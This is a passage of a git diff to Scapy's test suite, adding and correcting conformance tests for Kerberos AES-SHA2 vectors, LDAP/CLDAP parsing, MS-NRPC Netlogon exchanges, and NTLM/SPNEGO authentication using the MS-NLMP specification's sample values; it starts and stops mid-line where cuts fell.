key=bytes.fromhex("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) +cksum = k.make_checksum(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F1011121314")) +assert cksum.hex() == "45ee791567eefca37f4ac1e0222de80d43c3bfa06699672a" + += RFC8009 - Test vectors for AES-CTS HMAC-SHA2 - Sample pseudorandom function (PRF) invocations + +# enctype aes128-cts-hmac-sha256-128: + +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=bytes.fromhex("3705D96080C17728A0E800EAB6E0D23C")) +out = k.prf(b"test") +assert out.hex() == "9d188616f63852fe86915bb840b4a886ff3e6bb0f819b49b893393d393854295" + +# enctype aes256-cts-hmac-sha384-192: + +k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, key=bytes.fromhex("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) +out = k.prf(b"test") +assert out.hex() == "9801f69a368c2bf675e59521e177d9a07f67efe1cfde8d3c8d6f6a0256e3b17db3c1b62ad1b8553360d17367eb1514d2" = Decrypt PA-ENC-TIMESTAMP diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index 3495b81dfa6..4ea74163fb3 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -22,13 +22,13 @@ from scapy.layers.ntlm import * pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00x\xb2\x94@\x00\x80\x06\xd1\xf7\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x85\xc3U/c\x9fP\x18 \x12U\x96\x00\x000B\x02\x01\x0c`=\x02\x01\x03\x04\x00\xa36\x04\nGSS-SPNEGO\x04(NTLMSSP\x00\x01\x00\x00\x00\xb7\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f') assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) -ntlm = NTLM_Header(pkt[LDAP].protocolOp.authentication.credentials.val) +ntlm = pkt[LDAP].protocolOp.authentication.credentials assert isinstance(ntlm, NTLM_NEGOTIATE) pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x01\xce\xb2\x95@\x00\x80\x06\xd0\xa0\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x86\x13U/d9P\x18 \x11\x11\x93\x00\x000\x82\x01\x9c\x02\x01\r`\x82\x01\x95\x02\x01\x03\x04\x00\xa3\x82\x01\x8c\x04\nGSS-SPNEGO\x04\x82\x01|NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00h\x00\x00\x00\xec\x00\xec\x00\x80\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x08\x00\x08\x00X\x00\x00\x00\x08\x00\x08\x00`\x00\x00\x00\x10\x00\x10\x00l\x01\x00\x005\x82\x88\xe2\n\x00aJ\x00\x00\x00\x0f\xa0\xcd\xd2\xaa\xfdQc\xacs\\\xf6\xa3\x07\n\x05$t\x00o\x00t\x00o\x00W\x00I\x00N\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\xd1\x8e\xd6w\x99\t\rdQ\x05\xa6iI\xd1\x19\x01\x01\x00\x00\x00\x00\x00\x00\xb8}\x868\xe1\xc5\xd7\x01?\x84\xe3V\xcf&/\xf0\x00\x00\x00\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xb8}\x868\xe1\xc5\xd7\x01\x06\x00\x04\x00\x02\x00\x00\x00\x08\x000\x000\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00 \x00\x00\x0b\xd3s!~\x13\x9a\xcc\xc77\xf4\xcc\x90b\xcc|\x8f\xd2\xe8\xb85cw\x89#\x0e\x8bd\xfcPYf\n\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00(\x00l\x00d\x00a\x00p\x00/\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x002\x002\x00.\x001\x005\x006\x00\x00\x00\x00\x00\x00\x00\x00\x00rD\x8c\x9d\x1b\xa6\xa9\x1a7\xd3\x96\x0f\xbe\xab\xecC') assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) -ntlm = NTLM_Header(pkt[LDAP].protocolOp.authentication.credentials.val) +ntlm = pkt[LDAP].protocolOp.authentication.credentials assert isinstance(ntlm, NTLM_AUTHENTICATE_V2) assert ntlm.Payload[0] == ('UserName', 'toto') assert ntlm.Payload[1] == ('Workstation', 'WIN2') @@ -50,7 +50,7 @@ assert pkt[LDAP].protocolOp.diagnosticMessage.val == b'8009030C: LdapErr: DSID-0 = LDAP_SearchRequest -pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00[\xb2\x8e@\x00\x80\x06\xd2\x1a\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x84VU/V:P\x18 \x14Q<\x00\x000%\x02\x01\x08c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x00') +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00[\xb2\x8e@\x00\x80\x06\xd2\x1a\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x84VU/V:P\x18 \x14Q<\x00\x000%\x02\x01\x08c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x00') assert isinstance(pkt[LDAP].protocolOp, LDAP_SearchRequest) assert pkt[LDAP].protocolOp.baseObject == b"" assert pkt[LDAP].protocolOp.timeLimit == 0x64 @@ -65,7 +65,7 @@ assert raw(pkt2) == pkt.original pkt = LDAP(b'0\x82\nr\x02\x01\x08d\x82\nk\x04\x000\x82\ne0\x1a\x04\x13forestFunctionality1\x03\x04\x0120$\x04\x1ddomainControllerFunctionality1\x03\x04\x0170E\x04\x17supportedSASLMechanisms1*\x04\x06GSSAPI\x04\nGSS-SPNEGO\x04\x08EXTERNAL\x04\nDIGEST-MD50\x1e\x04\x14supportedLDAPVersion1\x06\x04\x013\x04\x0120\x82\x01\x98\x04\x15supportedLDAPPolicies1\x82\x01}\x04\x0eMaxPoolThreads\x04\x19MaxPercentDirSyncRequests\x04\x0fMaxDatagramRecv\x04\x10MaxReceiveBuffer\x04\x0fInitRecvTimeout\x04\x0eMaxConnections\x04\x0fMaxConnIdleTime\x04\x0bMaxPageSize\x04\x16MaxBatchReturnMessages\x04\x10MaxQueryDuration\x04\x12MaxDirSyncDuration\x04\x10MaxTempTableSize\x04\x10MaxResultSetSize\x04\rMinResultSets\x04\x14MaxResultSetsPerConn\x04\x16MaxNotificationPerConn\x04\x0bMaxValRange\x04\x15MaxValRangeTransitive\x04\x11ThreadMemoryLimit\x04\x18SystemMemoryLimitPercent0\x82\x03\xf2\x04\x10supportedControl1\x82\x03\xdc\x04\x161.2.840.113556.1.4.319\x04\x161.2.840.113556.1.4.801\x04\x161.2.840.113556.1.4.473\x04\x161.2.840.113556.1.4.528\x04\x161.2.840.113556.1.4.417\x04\x161.2.840.113556.1.4.619\x04\x161.2.840.113556.1.4.841\x04\x161.2.840.113556.1.4.529\x04\x161.2.840.113556.1.4.805\x04\x161.2.840.113556.1.4.521\x04\x161.2.840.113556.1.4.970\x04\x171.2.840.113556.1.4.1338\x04\x161.2.840.113556.1.4.474\x04\x171.2.840.113556.1.4.1339\x04\x171.2.840.113556.1.4.1340\x04\x171.2.840.113556.1.4.1413\x04\x172.16.840.1.113730.3.4.9\x04\x182.16.840.1.113730.3.4.10\x04\x171.2.840.113556.1.4.1504\x04\x171.2.840.113556.1.4.1852\x04\x161.2.840.113556.1.4.802\x04\x171.2.840.113556.1.4.1907\x04\x171.2.840.113556.1.4.1948\x04\x171.2.840.113556.1.4.1974\x04\x171.2.840.113556.1.4.1341\x04\x171.2.840.113556.1.4.2026\x04\x171.2.840.113556.1.4.2064\x04\x171.2.840.113556.1.4.2065\x04\x171.2.840.113556.1.4.2066\x04\x171.2.840.113556.1.4.2090\x04\x171.2.840.113556.1.4.2205\x04\x171.2.840.113556.1.4.2204\x04\x171.2.840.113556.1.4.2206\x04\x171.2.840.113556.1.4.2211\x04\x171.2.840.113556.1.4.2239\x04\x171.2.840.113556.1.4.2255\x04\x171.2.840.113556.1.4.2256\x04\x171.2.840.113556.1.4.2309\x04\x171.2.840.113556.1.4.2330\x04\x171.2.840.113556.1.4.23540\x81\xc9\x04\x15supportedCapabilities1\x81\xaf\x04\x171.2.840.113556.1.4.1851\x04\x171.2.840.113556.1.4.1670\x04\x171.2.840.113556.1.4.1791\x04\x171.2.840.113556.1.4.1935\x04\x171.2.840.113556.1.4.2080\x04\x171.2.840.113556.1.4.2237\x04\x171.2.840.113556.1.4.18800h\x04\x11subschemaSubentry1S\x04QCN=Aggregate,CN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x81\x88\x04\nserverName1z\x04xCN=WIN1$ADWIN1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0]\x04\x13schemaNamingContext1F\x04DCN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x81\x95\x04\x0enamingContexts1\x81\x82\x04:CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}\x04DCN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x18\x04\x0eisSynchronized1\x06\x04\x04TRUE0\x1e\x04\x13highestCommittedUSN1\x07\x04\x05123490\x81\x9e\x04\rdsServiceName1\x81\x8c\x04\x81\x89CN=NTDS Settings,CN=WIN1$ADWIN1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x15\x04\x0bdnsHostName1\x06\x04\x04WIN10"\x04\x0bcurrentTime1\x13\x04\x1120211020183502.0Z0Z\x04\x1aconfigurationNamingContext1<\x04:CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x0c\x02\x01\x08e\x07\n\x01\x00\x04\x00\x04\x00') assert pkt.getlayer(LDAP, 2) assert isinstance(pkt.protocolOp, LDAP_SearchResponseEntry) -assert isinstance(pkt.getlayer(LDAP, 2).protocolOp, LDAP_SearchResponseResultCode) +assert isinstance(pkt.getlayer(LDAP, 2).protocolOp, LDAP_SearchResponseResultDone) assert len(pkt.protocolOp.attributes) == 17 assert [x.type.val for x in pkt.protocolOp.attributes] == [ @@ -103,7 +103,7 @@ pkt = Ether(b'RT\x00\xbc\xe0=RT\x00y\xb1F\x08\x00E\x00\x00\xa5\x01\x1a\x00\x00\x assert pkt.protocolOp.filter.filter.getfieldval("and_")[2].filter.attributeType == b"NtVer" assert pkt.protocolOp.attributes[0].type == b"Netlogon" -raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x80G\x88"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\x88\x12\x04\x04Host\x04\nWINDOWS7-3\x88\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\n\x04\x08Netlogon' +assert raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0G\xa3"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\xa3\x12\x04\x04Host\x04\nWINDOWS7-3\xa3\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\n\x04\x08Netlogon' = More advanced CLDAP dissection & build test @@ -115,3 +115,50 @@ assert pkt.getlayer(CLDAP, 2).protocolOp.resultCode == 0x0 pkt2 = Ether(raw(pkt)) pkt2.clear_cache() assert raw(pkt2) == pkt.original + ++ Microsoft LDAP tests + += Test dissection of Microsoft LDAP + +pkt = LDAP(b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00\x00') +assert pkt.protocolOp.filter.filter.present.val == b'objectClass' +assert pkt.Controls is None + += Test re-build of Microsoft LDAP + +pkt = LDAP(protocolOp=LDAP_SearchRequest(filter=LDAP_Filter(filter=LDAP_FilterPresent(present=ASN1_STRING(b'objectClass'))), baseObject=ASN1_STRING(b''), scope=ASN1_ENUMERATED(0), derefAliases=ASN1_ENUMERATED(0), sizeLimit=ASN1_INTEGER(0), timeLimit=ASN1_INTEGER(100), attrsOnly=ASN1_BOOLEAN(0)), messageID=ASN1_INTEGER(1), Controls=None) + +conf.ASN1_default_long_size = 4 +assert bytes(pkt) == b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00\x00' + +conf.ASN1_default_long_size = 0 +assert bytes(pkt) == b'0%\x02\x01\x01c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x00' + += Craft new Microsoft LDAP Search Request with Controls + +conf.ASN1_default_long_size = 4 + +pkt = LDAP( + protocolOp=LDAP_SearchRequest( + filter=LDAP_Filter(filter=LDAP_FilterPresent(present=ASN1_STRING(b'objectClass'))), + attributes=[ + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'rootDomainNamingContext')), + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'defaultNamingContext')), + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'configurationNamingContext')) + ], + baseObject=ASN1_STRING(b''), + scope=ASN1_ENUMERATED(0), + derefAliases=ASN1_ENUMERATED(0), + sizeLimit=ASN1_INTEGER(1), + timeLimit=ASN1_INTEGER(100), + attrsOnly=ASN1_BOOLEAN(0) + ), + messageID=ASN1_INTEGER(2), + Controls=[ + LDAP_Control(controlType=ASN1_STRING(b'1.2.840.113556.1.4.529'), criticality=None, controlValue=ASN1_STRING(b'')) + ] +) + +assert bytes(pkt) == b'0\x84\x00\x00\x00\x9e\x02\x01\x02c\x84\x00\x00\x00o\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x01\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00K\x04\x17rootDomainNamingContext\x04\x14defaultNamingContext\x04\x1aconfigurationNamingContext\xa0\x84\x00\x00\x00 0\x84\x00\x00\x00\x1a\x04\x161.2.840.113556.1.4.529\x04\x00' + +conf.ASN1_default_long_size = 0 diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts new file mode 100644 index 00000000000..3d326bc1727 --- /dev/null +++ b/test/scapy/layers/msnrpc.uts @@ -0,0 +1,164 @@ +% MS-NRPC tests + ++ Dissect and Build full NRPC exchange + +# XXX in the DCE/RPC spec + MS-RPCE, padding is only supposed to be zeros +# but for some reason it's weird 0xaaaa, 0xaabb... stuff in Windows. +# This is ignored by all implementations, and looks like leftovers from Microsoft debugging +# but it means parsing + rebuilding properly a packet is *slightly* different. +# In the tests you will find several instances where we manually replace the padding with 0xAA, or similar +# to make the output match, but it would be cool to reverse engineer the ndr lib in windows and copy +# exactly the same debug values + += Load MSRPCE and bind + +load_layer("msrpce") +bind_layers(TCP, DceRpc, sport=40564) # the DCE/RPC port +bind_layers(TCP, DceRpc, dport=40564) + += Parse NRPC exchange (pcap) + +pkts = sniff(offline=scapy_path('test/pcaps/dcerpc_msnrpc.pcapng.gz'), session=DceRpcSession) + += Check ept_map_Request + +from scapy.layers.msrpce.ept import * + +epm_req = pkts[2][DceRpc5].payload.payload +assert isinstance(epm_req, ept_map_Request) +assert epm_req.max_towers == 4 +assert epm_req.map_tower.value.max_count == 75 +assert epm_req.map_tower.value.tower_length == 75 + +twr = protocol_tower_t(epm_req.map_tower.value.tower_octet_string) +assert twr.count == 5 +assert twr.floors[0].sprintf("%uuid%") == 'logon' + += Re-build ept_map_Request from scratch + +pkt = ept_map_Request( + entry_handle=NDRContextHandle(attributes=0, uuid=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'), + obj=NDRPointer( + referent_id=1, + value=UUID(Data1=0, Data2=0, Data3=0, Data4=b'\x00\x00\x00\x00\x00\x00\x00\x00') + ), + map_tower=NDRPointer( + referent_id=2, + value=twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00') + ), + max_towers=4 +) + +output = bytearray(bytes(pkt)) +assert bytes(output) == bytes(epm_req) + += Check ept_map_Response + +epm_resp = pkts[3][DceRpc5].payload.payload + +assert epm_resp.entry_handle.attributes == 0 +assert epm_resp.entry_handle.uuid == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert epm_resp.ITowers.max_count == 4 +assert epm_resp.ITowers.value[0].value[0].value.max_count == 75 +assert epm_resp.valueof("ITowers")[0].max_count == 75 +assert epm_resp.ITowers.value[0].value[0].value.tower_length == 75 +assert epm_resp.valueof("ITowers")[0].tower_length == 75 + +twr = protocol_tower_t(epm_resp.ITowers.value[0].value[0].value.tower_octet_string) +assert twr.floors[0].sprintf("%uuid%") == 'logon' +assert twr.floors[1].sprintf("%uuid%") == 'NDR 2.0' +assert twr.floors[1].rhs == 0 +assert twr.floors[2].protocol_identifier == 11 +assert twr.floors[3].sprintf("%protocol_identifier%") == "NCACN_IP_TCP" +assert twr.floors[3].rhs == 49676 +assert twr.floors[4].sprintf("%protocol_identifier%") == "IP" +assert twr.floors[4].rhs == "192.168.122.17" + += Re-build ept_map_Response from scratch + +pkt = ept_map_Response( + entry_handle=NDRContextHandle(attributes=0), + ITowers=[ + twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x0c\x01\x00\t\x04\x00\xc0\xa8z\x11'), + twr_p_t(tower_octet_string=b'\x05\x00\x13\x00\rxV4\x124\x12\xcd\xab\xef\x00\x01#Eg\xcf\xfb\x01\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8z\x11') + ], +) + +pkt.ITowers.value[0].value[0].referent_id = 0x3 +pkt.ITowers.value[0].value[1].referent_id = 0x4 +pkt.ITowers.max_count = 4 +assert bytes(pkt) == bytes(epm_resp) + += Check NetrServerReqChallenge_Request + +chall_req = pkts[6][NetrServerReqChallenge_Request] +assert chall_req.valueof("ComputerName") == b"WIN1" +assert chall_req.PrimaryName is None +assert chall_req.ClientChallenge.data == b"12345678" + += Re-build NetrServerReqChallenge_Request from scratch + +pkt = NetrServerReqChallenge_Request( + ComputerName=b'WIN1', + ClientChallenge=PNETLOGON_CREDENTIAL(data=b'12345678'), + PrimaryName=None, +) + +assert bytes(pkt) == bytes(chall_req) + += Check NetrServerReqChallenge_Response + +chall_resp = pkts[7][NetrServerReqChallenge_Response] +assert chall_resp.ServerChallenge.data == b'Zq/\xc4D\xfeRI' +assert chall_resp.status == 0 + += Re-build NetrServerReqChallenge_Response from scratch + +pkt = NetrServerReqChallenge_Response( + ServerChallenge=PNETLOGON_CREDENTIAL(data=b'Zq/\xc4D\xfeRI') +) + +assert bytes(pkt) == bytes(chall_resp) + += Check NetrServerAuthenticate3_Request + +auth_req = pkts[8][NetrServerAuthenticate3_Request] +assert auth_req.PrimaryName is None +assert auth_req.valueof("AccountName") == b"WIN1$" +assert auth_req.sprintf("%SecureChannelType%") == "WorkstationSecureChannel" +assert auth_req.valueof("ComputerName") == b"WIN1" +assert auth_req.ClientCredential.data == b'd:\xb3p\xc6\x9e\xf40' +assert auth_req.NegotiateFlags == 1611661311 + += Re-build NetrServerAuthenticate3_Request from scratch + +pkt = NetrServerAuthenticate3_Request( + AccountName=b'WIN1$', + ComputerName=b'WIN1', + ClientCredential=PNETLOGON_CREDENTIAL(data=b'd:\xb3p\xc6\x9e\xf40'), + PrimaryName=None, + SecureChannelType="WorkstationSecureChannel", + NegotiateFlags=1611661311, +) + +output = bytearray(bytes(pkt)) +assert bytes(output) == bytes(auth_req) + += Check NetrServerAuthenticate3_Response + +auth_resp = pkts[9][NetrServerAuthenticate3_Response] +assert auth_resp.ServerCredential.data == b'1h\x8d\xb8\xf4zH\xaf' +assert auth_resp.NegotiateFlags == 1611661311 +assert auth_resp.AccountRid == 1105 +assert auth_resp.status == 0 + += Re-build NetrServerAuthenticate3_Response from scratch + +pkt = NetrServerAuthenticate3_Response( + ServerCredential=PNETLOGON_CREDENTIAL(data=b'1h\x8d\xb8\xf4zH\xaf'), + NegotiateFlags=1611661311, + AccountRid=1105, + status=0 +) + +assert bytes(pkt) == bytes(auth_resp) diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts new file mode 100644 index 00000000000..1f37d11f330 --- /dev/null +++ b/test/scapy/layers/ntlm.uts @@ -0,0 +1,431 @@ +% NTLM tests + ++ [MS-NLMP] tests + += [MS-NLMP] 4.2.1 - Common Values + +User = "User" +UserDom = "Domain" +Passwd = "Password" +ServerName = "Server" +WorkstationName = "COMPUTER" +RandomSessionKey = b"UUUUUUUUUUUUUUUU" +Time = 0 +ClientChallenge = b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' +ServerChallenge = b'\x01\x23\x45\x67\x89\xab\xcd\xef' + += [MS-NLMP] 4.2.4 + +NegotiateFlags = 0xe28a8233 +AVPairs1 = "Server" +AVPairs2 = "Domain" + += [MS-NLMP] 4.2.4.1.1 NTOWFv2() + +ResponseKeyNT = NTOWFv2(Passwd, User, UserDom) +assert ResponseKeyNT == b'\x0c\x86\x8a@;\xfdz\x93\xa3\x00\x1e\xf2.\xf0.?' + += Build NTLMv2_RESPONSE + +ntlm_response = NTLMv2_RESPONSE( + TimeStamp=Time, + ChallengeFromClient=ClientChallenge, + AvPairs=[ + AV_PAIR(AvId="MsvAvNbDomainName", Value=AVPairs2), + AV_PAIR(AvId="MsvAvNbComputerName", Value=AVPairs1), + AV_PAIR(AvId="MsvAvEOL"), # Windows does this (samba does not) + AV_PAIR(AvId="MsvAvEOL"), + ] +) + += [MS-NLMP] 4.2.4.2.2 NTLMv2 Response + +ntlm_response.NTProofStr = ntlm_response.computeNTProofStr( + ResponseKeyNT, + ServerChallenge, +) +assert ntlm_response.NTProofStr == b'h\xcd\n\xb8Q\xe5\x1c\x96\xaa\xbc\x92{\xeb\xefj\x1c' + += [MS-NLMP] 4.2.4.1.2 Session Base Key + +ExportedSessionKey = SessionBaseKey = NTLMv2_ComputeSessionBaseKey( + ResponseKeyNT, + ntlm_response.NTProofStr, +) +assert SessionBaseKey == b'\x8d\xe4\x0c\xca\xdb\xc1J\x82\xf1\\\xb0\xad\r\xe9\\\xa3' + += [MS-NLMP] 4.2.4.2.3 Encrypted Session Key + +EncryptedRandomSessionKey = RC4K(SessionBaseKey, RandomSessionKey) +assert EncryptedRandomSessionKey == b'\xc5\xda\xd2TO\xc9y\x90\x94\xce\x1c\xe9\x0b\xc9\xd0>' + += [MS-NLMP] 4.2.4.3 Messages + +ntlm_nego = NTLM_NEGOTIATE( + NegotiateFlags=NegotiateFlags, + ProductMajorVersion=5, + ProductMinorVersion=1, + ProductBuild=2600, +) +ntlm_nego.DomainName = UserDom +ntlm_nego.WorkstationName = WorkstationName + +# ntlm_chall = NTLM_Header(b'NTLMSSP\x00\x02\x00\x00\x00\x0c\x00\x0c\x008\x00\x00\x003\x82\x8a\xe2\x01#Eg\x89\xab\xcd\xef\x00\x00\x00\x00\x00\x00\x00\x00$\x00$\x00D\x00\x00\x00\x06\x00p\x17\x00\x00\x00\x0fS\x00e\x00r\x00v\x00e\x00r\x00\x02\x00\x0c\x00D\x00o\x00m\x00a\x00i\x00n\x00\x01\x00\x0c\x00S\x00e\x00r\x00v\x00e\x00r\x00\x00\x00\x00\x00') + +ntlm_auth = NTLM_Header(b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00l\x00\x00\x00T\x00T\x00\x84\x00\x00\x00\x0c\x00\x0c\x00H\x00\x00\x00\x08\x00\x08\x00T\x00\x00\x00\x10\x00\x10\x00\\\x00\x00\x00\x10\x00\x10\x00\xd8\x00\x00\x005\x82\x88\xe2\x05\x01(\n\x00\x00\x00\x0fD\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaah\xcd\n\xb8Q\xe5\x1c\x96\xaa\xbc\x92{\xeb\xefj\x1c\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x02\x00\x0c\x00D\x00o\x00m\x00a\x00i\x00n\x00\x01\x00\x0c\x00S\x00e\x00r\x00v\x00e\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\xda\xd2TO\xc9y\x90\x94\xce\x1c\xe9\x0b\xc9\xd0>') + +assert ntlm_auth.MIC is None + += [MS-NLMP] 4.2.4.4 GSS_WrapEx + +SeqNum = 0 +Plaintext = b'P\x00l\x00a\x00i\x00n\x00t\x00e\x00x\x00t\x00' + +SealKey = SEALKEY(ntlm_nego.NegotiateFlags, RandomSessionKey, "Client") +assert SealKey == b'Y\xf6\x00\x97<\xc4\x96\n%H\n|\x19nLX' + +SignKey = SIGNKEY(ntlm_nego.NegotiateFlags, RandomSessionKey, "Client") +assert SignKey == b'G\x88\xdc\x86\x1bG\x82\xf3]C\xfd\x98\xfe\x1a-9' + +# Build SSP and Context manually +ssp = NTLMSSP() +ctx = NTLMSSP.CONTEXT() +ctx.SendSeqNum = SeqNum +ctx.SendSignKey = SignKey +ctx.SendSealKey = SealKey +ctx.SendSealHandle = RC4Init(SealKey) + +_msgs, sig = ssp.GSS_WrapEx(ctx, [ + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=Plaintext), +]) +s = _msgs[0].data + +assert s == b'T\xe5\x01e\xbf\x196\xdc\x99` \xc1\x81\x1b\x0f\x06\xfb_' +assert sig.Checksum == b'\x7f\xb3\x8e\xc5\xc5]Iv' + +assert bytes(sig) == b'\x01\x00\x00\x00\x7f\xb3\x8e\xc5\xc5]Iv\x00\x00\x00\x00' + ++ GSS-API SPNEGO: SPNEGOSSP tests + += Create client and server SPNEGOSSPs + +from scapy.layers.ntlm import NTLM_NEGOTIATE +from scapy.layers.spnego import SPNEGO_negTokenInit, SPNEGO_negTokenResp, SPNEGO_Token, SPNEGO_negToken, SPNEGO_MechListMIC, SPNEGOSSP + +auth_level = 0x06 # privacy + +client = SPNEGOSSP([ + NTLMSSP( + UPN="User1", + PASSWORD="Password1", + auth_level=auth_level, + ), +]) +server = SPNEGOSSP([ + NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1"), + }, + NTLM_VALUES={ + "NetbiosDomainName": "DOMAIN", + "NetbiosComputerName": "WIN10", + "DnsDomainName": "domain.local", + "DnsComputerName": "WIN10.domain.local", + "DnsTreeName": "domain.local", + }, + auth_level=auth_level, + ) +]) + += GSS_Init_sec_context (negTokenInit: NTLM_NEGOTIATE) + +clicontext, tok, negResult = client.GSS_Init_sec_context(None) +assert negResult == 1 +assert isinstance(tok, GSSAPI_BLOB) +tok = GSSAPI_BLOB(bytes(tok)) +assert tok.MechType.val == '1.3.6.1.5.5.2' +assert isinstance(tok.innerToken.token, SPNEGO_negTokenInit) +assert len(tok.innerToken.token.mechTypes) == 1 +assert tok.innerToken.token.mechTypes[0].oid == '1.3.6.1.4.1.311.2.2.10' +assert tok.innerToken.token.reqFlags is None +assert tok.innerToken.token.negHints is None +assert tok.innerToken.token.mechListMIC is None +assert tok.innerToken.token._mechListMIC is None + +ntlm_nego = tok.innerToken.token.mechToken.value +assert isinstance(ntlm_nego, 